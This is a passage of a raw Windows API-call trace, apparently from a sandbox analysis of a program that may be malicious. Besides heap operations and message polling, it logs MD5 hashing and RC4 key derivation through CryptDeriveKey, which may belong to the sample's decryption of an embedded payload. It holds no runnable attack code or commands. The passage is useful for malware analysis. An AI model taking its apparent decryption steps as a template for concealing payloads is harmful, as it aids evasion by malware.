wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0189.233] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0189.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0189.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0189.233] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0189.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0189.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0189.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0189.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.233] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0189.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.234] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.234] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0189.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0189.234] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0189.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0189.234] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0189.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0189.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0189.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0189.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0189.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.235] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0189.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.235] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.235] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0189.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0189.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0189.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0189.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0189.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0189.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0189.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0189.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0189.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.237] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.237] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.237] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0189.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.237] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.237] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.238] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.238] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.238] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.239] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.239] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.239] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.239] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.239] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.239] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.239] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.239] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.239] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0189.239] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.239] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0189.239] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.239] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.240] CryptCreateHash (in: hProv=0xaa3868, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0189.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.240] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0189.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.240] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.240] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.240] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.240] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.240] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.240] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.241] CryptHashData (hHash=0xaa5860, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0189.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.241] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.241] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.241] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.241] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.241] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.241] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0189.241] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.241] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0189.241] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.241] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.241] CryptDeriveKey (in: hProv=0xaa3868, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58a0) returned 1 [0189.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0189.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0189.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0189.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0189.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0189.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0189.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0189.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0189.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0189.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0189.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0189.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0189.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0189.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0189.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0189.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0189.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.245] HeapFree (in: 